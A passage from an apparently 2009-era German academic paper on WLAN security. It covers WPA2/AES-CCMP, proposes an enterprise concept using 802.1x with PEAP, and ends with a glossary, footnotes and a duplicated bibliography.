Die bedeutendste Erweiterung zu WPA stellt die Einführung des neuen Verschlüsselungsverfahrens AES-CCMP^[28] dar, welches im Gegensatz zu WEP und TKIP nicht mehr auf RC4 basiert und zur Sicherstellung der Integrität das CTR/CBC-MAC Protokoll (CCMP) nutzt. TKIP wird nur noch aufgrund der Abwärtskompatibilität unterstützt. Der AES-Algorithmus arbeitet mit einem 128 Bit langen Schlüssel und einem 48 Bit langen IV, der sich ständig ändert und bei Wiederholung verworfen wird. Somit nutzt WPA2 dieselben verbesserten und bislang nicht geknackten Sicherheitsmechanismen, die bereits von WPA verwendet wurden und erhöht das Sicherheitsniveau darüber hinaus durch den Einsatz von AES. Für AES sind bislang keine angreifbaren Schwachstellen bekannt, und mit einer Schlüssellänge von 128 Bit ist ein Brute-Force-Angriff praktisch nicht durchführbar.
Somit gilt WPA2 / 802.11i nach heutigem Kenntnisstand und technischer Entwicklung als sicher. Im Enterprise Modus in Kombination mit 802.1x und einem sicheren EAP Authentifizierungsprotokoll ist es daher die empfohlene Wahl zur Absicherung von Funknetzwerken.
Der Standard genügt auch den Vorschriften des Federal Information Standards (FIPS) und ist so behördentauglich Nachteilig wirkt sich allerdings der zusätzliche Rechenaufwand für Verschlüsselung und Authentifizierung aus, der sowohl den Einsatz neuester Hard- und Software voraussetzt, als auch Probleme beim schnellen Roaming verursachen kann.

4 Beispiel eines WLAN Sicherheitskonzeptes

Das folgende Konzept ist ausgelegt für ein mittleres bis großes Unternehmen mit normalen Sicherheitsanforderungen (also nicht Forschung oder Militär). Ausgehend von den oben vorgestellten technischen Möglichkeiten und unter Berücksichtigung wesentlicher Unternehmensanforderungen, wie z.B. die Nutzung offener Standards, Skalierbarkeit, zentrales Management, Integration, Flexibilität und hohem Sicherheitsniveau wird eine Authentifizierung nach 802.1x mit PEAP und WPA2 zur Datenverschlüsselung vorgeschlagen.

Abb. 6: Konzept einer WLAN Sicherheitsinfrastruktur

Wesentliche Merkmale sind:

Einsatz eines zentralen und je größerem Standort dezentralen WLC (Wireless Lan Controller)^[29] zur Sicherstellung von:
1. Zentrales Management der WLAN Infrastruktur
2. Automatische Konfiguration der Access Points
3. Steuerung der Authentifizierung und Verschlüsselung
4. Monitoring (z.B. Status Access Points, Clients, Rogue Access Points)
5. Intrusion Detection
6. Automatisches Failover
7. Dynamisches Frequenz- und Leistungsmanagement
Ausfallsicherheit durch redundante Komponenten wie WLC, Netzwerkdienste, Radius und Zertifikatsserver (CA)
VLANs für unterschiedliche Netzwerke (Büro, Produktion, Gast, VoIP), logische Trennung vom LAN
Integration in / Nutzung von Active Directory und der Public Key Infrastructure
Einfache Handhaben und Clientkonfiguration

5 Fazit

Aufgrund der Vorteile der WLAN Technologie stellt sich für Unternehmen meist nicht mehr die Frage des Einsatzes, sondern die der Art und Weise der Implementierung und Nutzung. Dabei gilt sowohl für bestehende als auch neue WLAN Infrastrukturen, dass eine umfassende Planung und ein bedarfsgerechtes, individuelles Sicherheitskonzept eine wesentliche Voraussetzung für den sicheren Betrieb sind. Dieses sollte organisatorische und technische Rahmenbedingungen umfassen und sich in die bestehende IT Umgebung integrieren lassen.
Dazu ist eine regelmäßige Kontrolle und Anpassung der Sicherheitsmaßnahmen nötig, da sich durch aktuelle Entwicklungen ehemals sichere Mechanismen als unzureichend herausstellen können.
In Unternehmen werden die Gefahren eines unzureichend gesicherten funkbasierten Netzwerkes allerdings immer noch zu oft unterschätzt. So wird oftmals immer noch WEP als einziger Absicherungsmechanismus eingesetzt. Die Gründe dafür sind mangelndes Gefahrenbewusstsein und KnowHow der verantwortlichen IT Leiter oder auch die Kosten, die mit einer Modernisierung der bestehenden WLAN Umgebung verbunden sind.
Technisch gesehen bieten die neuen Sicherheitsfunktionen wie 802.11i / WPA2 alle Voraussetzung für den Aufbau einer sicheren Infrastruktur. Dies ist zudem durch die Wahl zwischen Personal und Enterprise Modus sehr flexibel und skalierbar zu realisieren. Voraussetzung dazu ist der Einsatz moderner Hard- und Software, um die volle Kompatibilität zu aktuellen Standards zu gewährleisten.

6 Glossar

Begriff	Bedeutung
802.1x	IEEE-Standard für portbezogene sichere Authentifizierung; in der Regel mittels RADIUS realisiert und im Zusammenspiel mit EAP funktional erweiterbar.
Access Point	Zentraler Funkknoten, der für ein bestimmtes Gebiet die Versorgung der Clients mit der drahtlosen Netzanbindung übernimmt.
AES	Symmetrisches 256-Bit Verschlüsselungsverfahren, das u.a. anderem bei WPA und IPSec zum Einsatz kommt. Nachfolger von DES.
Authentifizierung	Überprüfung von Benutzer und Zugriffsrechten, um unerlaubte Zugriffe auf Netze, Server, Programme und Daten zu verhindern.
CCMP	Verschlüsselungsprotokoll, das bei WPA2 benutzt wird und auf der AES-Block Cipher-Suite basiert.
Denial of Service	Bezeichnet einen Angriff auf ein System mit dem Ziel, einen oder mehrere seiner Dienste arbeitsunfähig zu machen. In der Regel geschieht dies durch Überlastung.
EAP	Universelles Protokoll für verschiedene Authentisierungsverfahren. Das EAP Protokoll selbst führt keinerlei Authentisierung durch; es dient nur dazu, einen standardisierten Authentisierungsvorgang zwischen dem Client und einem Radius Authentisierungsserver zu ermöglichen.
Firewall	System aus soft- und hardwaretechnischen Komponenten, um IP-Netze sicher zu koppeln
IDS	Dient der Überwachung von Netzwerk-Aktivitäten. Ziel ist es, Angriffe auf die Sicherheitsmaßnahmen eines Systems zu erkennen und zu signalisieren, so dass geeignete automatische oder manuelle Gegenmaßnahmen getroffen werden können.
IEEE	Technisches Gremium aus mehr als 350.000 einzelnen Mitgliedern in mehr als 150 Ländern. IEEE veröffentlicht Literatur über technische Neu- und Weiterentwicklungen, initiiert Konferenzen und ist für die Festlegung von Industrie-Standards verantwortlich.
Integrität	Bezeichnet die Sicherstellung der Korrektheit (Unversehrtheit) von Daten und der korrekten Funktionsweise von Systemen.
Man-In-The-Middle	Angriffsform, bei der ein Angreifer entweder physikalisch oder – heute meist – logisch zwischen zwei oder mehreren Kommunikationspartnern steht, dabei die komplette Kontrolle über den Datenverkehr übernimmt und die Informationen nach Belieben einsehen und manipulieren kann.
PKI	Beschreibt die Nutzungen von digitalen Zertifikaten zur Nutzung einer asymmetrische Verschlüsselung mit einem öffentlichen (Public-Key) und einem privaten Schlüssel (Private-Key).
QoS	Bandbreitenmanagement, beispielsweise zur Priorisierung von Diensten, wie Sprachübertragung.
RADIUS	Client-Server-Protokoll, das zur Authentifizierung, Autorisierung und zum Accounting (Triple-A-System) dient.
Replay-Angriff	Kryptoanalytische Angriffsform auf die Authentizität von Daten in einem Kommunikationsprotokoll. Hierbei sendet der Angreifer zuvor aufgezeichnete Daten, um etwa eine fremde Identität vorzutäuschen.
Roaming	Mobil eingesetzte Geräte können sich ohne Beeinflussung und Unterbrechung des Datenverkehrs zwischen verschiedenen Zellen bzw. Access Points eines Netzwerkes bewegen.
Rogue Access Point	Ein nicht autorisierten Access Point, der mit dem drahtgebundenen Netzwerk verbunden wurde. Er kann böswilligen oder nicht autorisierten Benutzern einen offenen Zugang zum LAN bieten.
Spoofing	Umfasst verschiedene Arten von Täuschungsversuche in Computernetzwerken zur Verschleierung der eigenen Identität.
SSID	Netzwerkname eines WLAN mit dem sich Drahtlosnetzwerke innerhalb derselben Reichweite voneinander abgrenzen.
TKIP	Verschlüsselungsprotokoll für WLANs, das die bekannten Sicherheitslücken von WEP behebt und im Standard WPA verwendet wird.
Verschlüsselung	Verfahren, durch das ein klarer Text (plain text) mittels eindeutig definierte Regeln und Algorithmen (Schlüssel) in eine unverständliche Zeichenfolge umgewandelt wird. Der Schlüssel muss auch zur Entschlüsselung verwendet werden.
VLAN	Dient der logischen Strukturierung von Netzen.
VPN	Netzwerk, das physisch innerhalb eines anderen Netzes betrieben wird, jedoch logisch getrennt ist. Unter Zuhilfenahme kryptographischer Verfahren wird die Integrität und Vertraulichkeit von Daten geschützt und die Kommunikationspartner können sicher authentisieren werden.
WEP	Bezeichnet ein für Wireless LANs verwendetes 64-Bit Verschlüsselungsverfahren.
Wi-Fi Alliance	Herstellerkonsortium, das die Standardkonformität sowie Interoperabilität von WLAN-Produkten durch eigene Tests sicherstellt und mit dem Wi-Fi-Siegel bescheinigt.
WLAN	Bezeichnung drahtloser Netzwerke, die auf der als IEEE 802.11 bezeichneten Gruppe von Standards basieren, welche vom Institute of Electrical and Electronics Engineers (IEEE) spezifiziert wurden.
WPA	Implementation einer frühen Version des 802.11i-Standards, basierend auf dem TKIP-Verschlüsselungsprotokoll.
WPA2	Erweiterung von WPA um AES und dadurch 802.11i-konform.
Zertifizierungsstelle	Erstellt und verwaltet die elektronischen Schlüssel für die Verschlüsselung.

7 Fußnoten

↑ Intel (2003): http://www.intel.com/pressroom/archive/releases/2003/20030312comp.htm, 15.01.09, 15:00
↑ IEEE (2007): IEEE Standard 802.11, http://standards.ieee.org/getieee802/download/802.11-2007.pdf, 04.01.2009, 10:21,
↑ Ternes, Berthold (2005): BSI:Technische Richtlinien Sicheres WLAN Teil 1, Seite 15f
↑ vgl. http://www.networkcomputing.de/wireless-lan-ausblick-2009-weiter-warten-auf-80211n/?no_cache=1, 05.01.2009, 22:32
↑ Schemberg, Axel (2007): PC-Netzwerke - Planes und sicheres Einrichten von LAN und WLAN, Seite 53ff
↑ Microsoft (2004): Planungshandbuch - Sichern von Wireless LANs mit Zertifikatsdiensten, http://www.microsoft.com/germany/technet/datenbank/articles/900169.mspx, 10.01.2009, 20:05
↑ Toshiba: http://uk.computers.toshiba-europe.com/innovation/download_whitepaper.jsp?service=UK&WHITEPAPER_ID=0000000fde_123&PRODUCT_ID=0000000fde _123, 08.01.2009, 19:15
↑ Silicon: http://www.silicon.de/mobile/wireless/0,39039018,39200069,00/kleine+firmen+pokern+bei+der+wlan_sicherheit.htm, 10.01.2009, 19:00
↑ Microsoft (2004): Planungshandbuch - Sichern von Wireless LANs mit Zertifikatsdiensten, http://www.microsoft.com/germany/technet/datenbank/articles/900168.mspx, 24.12.2008, 10:22
↑ Eckert, Claudia (2008): IT-Sicherheit. Konzepte - Verfahren - Protokolle, Seite 823ff
↑ BSI (2009): M 2.192 Erstellung einer IT-Sicherheitsleitlinie, http://www.bsi.bund.de/gshb/deutsch/m/m02192.htm, 15.01.2009, 15:21
↑ McAfee (2006): Gefahren von innen,http://www.all-about-security.de/security-artikel/organisation/mensch-und-security/artikel/834-gefahren-von-innen-die-eigenen-mitarbeiter-als-sicherheitsr/, 31.12.2008, 14:01
↑ Ternes, Berthold (2005): BSI:Technische Richtlinien Sicheres WLAN Teil 2, Seite 45ff
↑ Ternes, Berthold (2005): BSI:Technische Richtlinien Sicheres WLAN Teil 1, Seite 21ff
↑ Eckert, Claudia (2008): IT-Sicherheit. Konzepte - Verfahren - Protokolle, Seite 828ff
↑ Backtrack: http://www.remote-exploit.org/backtrack.html, 10.01.2009, 15:00
↑ Aircrack-NG, http://www.aircrack-ng.org/doku.php, 24.12.2008, 10:15
↑ vgl. http://www.bajwa.org/files/cs388_Project_1_report_AhmedBajwa.pdf, 10.01.2009, 20:12
↑ Georg Ou (2007): Ultimate wireless security guide,http://articles.techrepublic.com.com/5100-10878_11-6148557.html
↑ Ternes, Berthold (2005): BSI:Technische Richtlinien Sicheres WLAN Teil 1, Seite 27ff
↑ Eckert, Claudia (2008): IT-Sicherheit. Konzepte - Verfahren - Protokolle, Seite 852ff
↑ IETF (2000): RADIUS - RFC 2865, http://tools.ietf.org/html/rfc2865
↑ IETF: http://www.ietf.org/rfc/rfc3748.txt, 15.01.09, 16:00
↑ Ternes, Berthold (2005): BSI:Technische Richtlinien Sicheres WLAN Teil 1, Seite 56ff
↑ Heise (2004): Angriffe auf WPA, http://www.heise.de/security/Angriffe-auf-WPA--/artikel/53014, 31.12.2008, 14:01
↑ Heise (2002): Funknetz-Absicherung WPA offenbart Schwächen, http://www.heise.de/newsticker/Funknetz-Absicherung-WPA-offenbart-Schwaechen--/meldung/32542, 31.12.2008, 14:01
↑ IEEE (2004): IEEE Standard 802.11i, http://standards.ieee.org/getieee802/download/802.11i-2004.pdf, 31.12.2008, 16:21
↑ Eckert, Claudia (2008): IT-Sicherheit. Konzepte - Verfahren - Protokolle, Seite 855ff
↑ Cisco (2008): Cisco Wireless LAN Controller Configuration Guide, Release 5.1, S. 230

8 Literatur- und Quellenverzeichis

AirCrack-NG	Toolsammlung für die WEP und WPA-Entschlüsselung, http://www.aircrack-ng.org/, 24.12.2008, 10:15
Arnold, Dr. Alfred (2006)	WLAN-Verschlüsselung - WEP und WPA durchleuchtet, 2006, http://www.heise.de/netze/WLAN-Verschluesselung--/artikel/77947/0, (31.12.2008, 14:01)
BSI (2008)	IT-Grundschutz, 2009, http://www.bsi.bund.de/gshb/index.htm, 10.01.2009, 15:21
Cisco (2008)	Cisco Wireless LAN Controller Configuration Guide, Release 5.1, 2008, http://www.cisco.com/en/US/docs/wireless/controller/5.1/configuration/guide/ccg51.html, 10.12.2008, 19:01
Eckert, Claudia (2008)	IT-Sicherheit. Konzepte - Verfahren - Protokolle, 5. Auflage, Oldenbourg Wissenschaftsverlag, München 2008, ISBN 978-3-486-58270-3
Heise	Heise online, http://heise.de, 31.12.2008, 14:01
IEEE Organisation (2004)	IEEE Standard 802.11i, http://standards.ieee.org/getieee802/download/802.11i-2004.pdf, 31.12.2008, 14:01
IEEE Organisation (2007)	IEEE Standard 802.11, http://standards.ieee.org/getieee802/download/802.11-2007.pdf, 31.12.2008, 14:01
Lehembre, Guillaume (2006)	Wi-Fi-Sicherheit – WEP, WPA und WPA2, 2006, hakin9 Nr. 1/2006, http://www.hsc.fr/ressources/articles/hakin9_wifi/hakin9_wifi_DE.pdf, 31.12.2008, 14:01
Lancom (2004)	Techpaper WPA und 802.11i, http://www.lancom-systems.de/fileadmin/produkte/feature/techpaper/TP-WLAN-80211i-DE.pdf, 31.12.2008, 14:01
Microsoft (2004)	Planungshandbuch - Sichern von Wireless LANs mit Zertifikatsdiensten, http://www.microsoft.com/germany/technet/datenbank/articles/900168.mspx, 31.12.2008, 14:01
Plötner, Johannes (2007)	Praxisbuch Netzwerk-Sicherheit: Risikoanalyse, Methoden und Umsetzung, 2. Auflage, Galileo Press, Bonn 2007, ISBN 3898428281
Schemberg, Axel (2007)	PC-Netzwerke - Planes und sicheres Einrichten von LAN und WLAN, 2007, 3. Auflage, Galileo Press, Bonn 2007, ISBN 3836210622
Schmitt, Kathrin (2008)	Hacker lieben Wlan, 2008 http://www.silicon.de/sicherheit/management/0,39039020,39191029-4,00/hacker+lieben+wlan.htm, 31.12.2008, 14:01
Ternes, Berthold (2005)	BSI:Technische Richtlinien Sicheres WLAN Teil 1: Darstellung und Bewertung der Sicherheitsmechanismen, 1. Auflage, SecuMedia, Ingelheim 2005, ISBN 978-3-922746-70-6
Ternes, Berthold (2005)	BSI:Technische Richtlinien Sicheres WLAN Teil 2: Vorgaben eines WLAN Sicherheitskonzeptes, 1. Auflage, SecuMedia, Ingelheim 2005, ISBN 978-3-922746-70-6
Ternes, Berthold (2005)	BSI:Technische Richtlinien Sicheres WLAN Teil 3: Auswahlkriterien / Prüfkriterien für WLAN Systeme, 1. Auflage, SecuMedia, Ingelheim 2005, ISBN 978-3-922746-70-6
WiFi Org	Organisation zur Zertifizierung von Wi-Fi Produkten, http://www.wi-fi.org/, 10.01.2009, 18:20

[0] Intel (2003): http://www.intel.com/pressroom/archive/releases/2003/20030312comp.htm, 15.01.09, 15:00

[1] IEEE (2007): IEEE Standard 802.11, http://standards.ieee.org/getieee802/download/802.11-2007.pdf, 04.01.2009, 10:21,

[2] Ternes, Berthold (2005): BSI:Technische Richtlinien Sicheres WLAN Teil 1, Seite 15f

[3] vgl. http://www.networkcomputing.de/wireless-lan-ausblick-2009-weiter-warten-auf-80211n/?no_cache=1, 05.01.2009, 22:32

[4] Schemberg, Axel (2007): PC-Netzwerke - Planes und sicheres Einrichten von LAN und WLAN, Seite 53ff

[5] Microsoft (2004): Planungshandbuch - Sichern von Wireless LANs mit Zertifikatsdiensten, http://www.microsoft.com/germany/technet/datenbank/articles/900169.mspx, 10.01.2009, 20:05

[6] Toshiba: http://uk.computers.toshiba-europe.com/innovation/download_whitepaper.jsp?service=UK&WHITEPAPER_ID=0000000fde_123&PRODUCT_ID=0000000fde _123, 08.01.2009, 19:15

[7] Silicon: http://www.silicon.de/mobile/wireless/0,39039018,39200069,00/kleine+firmen+pokern+bei+der+wlan_sicherheit.htm, 10.01.2009, 19:00

[8] Microsoft (2004): Planungshandbuch - Sichern von Wireless LANs mit Zertifikatsdiensten, http://www.microsoft.com/germany/technet/datenbank/articles/900168.mspx, 24.12.2008, 10:22

[9] Eckert, Claudia (2008): IT-Sicherheit. Konzepte - Verfahren - Protokolle, Seite 823ff

[10] BSI (2009): M 2.192 Erstellung einer IT-Sicherheitsleitlinie, http://www.bsi.bund.de/gshb/deutsch/m/m02192.htm, 15.01.2009, 15:21

[11] McAfee (2006): Gefahren von innen,http://www.all-about-security.de/security-artikel/organisation/mensch-und-security/artikel/834-gefahren-von-innen-die-eigenen-mitarbeiter-als-sicherheitsr/, 31.12.2008, 14:01

[12] Ternes, Berthold (2005): BSI:Technische Richtlinien Sicheres WLAN Teil 2, Seite 45ff

[13] Ternes, Berthold (2005): BSI:Technische Richtlinien Sicheres WLAN Teil 1, Seite 21ff

[14] Eckert, Claudia (2008): IT-Sicherheit. Konzepte - Verfahren - Protokolle, Seite 828ff

[15] Backtrack: http://www.remote-exploit.org/backtrack.html, 10.01.2009, 15:00

[16] Aircrack-NG, http://www.aircrack-ng.org/doku.php, 24.12.2008, 10:15

[17] vgl. http://www.bajwa.org/files/cs388_Project_1_report_AhmedBajwa.pdf, 10.01.2009, 20:12

[18] Georg Ou (2007): Ultimate wireless security guide,http://articles.techrepublic.com.com/5100-10878_11-6148557.html

[19] Ternes, Berthold (2005): BSI:Technische Richtlinien Sicheres WLAN Teil 1, Seite 27ff

[20] Eckert, Claudia (2008): IT-Sicherheit. Konzepte - Verfahren - Protokolle, Seite 852ff

[21] IETF (2000): RADIUS - RFC 2865, http://tools.ietf.org/html/rfc2865

[22] IETF: http://www.ietf.org/rfc/rfc3748.txt, 15.01.09, 16:00

[23] Ternes, Berthold (2005): BSI:Technische Richtlinien Sicheres WLAN Teil 1, Seite 56ff

[24] Heise (2004): Angriffe auf WPA, http://www.heise.de/security/Angriffe-auf-WPA--/artikel/53014, 31.12.2008, 14:01

[25] Heise (2002): Funknetz-Absicherung WPA offenbart Schwächen, http://www.heise.de/newsticker/Funknetz-Absicherung-WPA-offenbart-Schwaechen--/meldung/32542, 31.12.2008, 14:01

[26] IEEE (2004): IEEE Standard 802.11i, http://standards.ieee.org/getieee802/download/802.11i-2004.pdf, 31.12.2008, 16:21

[27] Eckert, Claudia (2008): IT-Sicherheit. Konzepte - Verfahren - Protokolle, Seite 855ff

[28] Cisco (2008): Cisco Wireless LAN Controller Configuration Guide, Release 5.1, S. 230

[1]

[2]

[3]

[4]

[5]

[6]

[7]

[8]

[9]

[10]

[11]

[12]

[13]

[14]

[15]

[16]

[17]

[18]

[19]

[20]

[21]

[22]

[23]

[24]

[25]

[26]

[27]

[28]

[29]

WLAN Sicherheitsmerkmale und deren Bewertung für den Einsatz im Unternehmensumfeld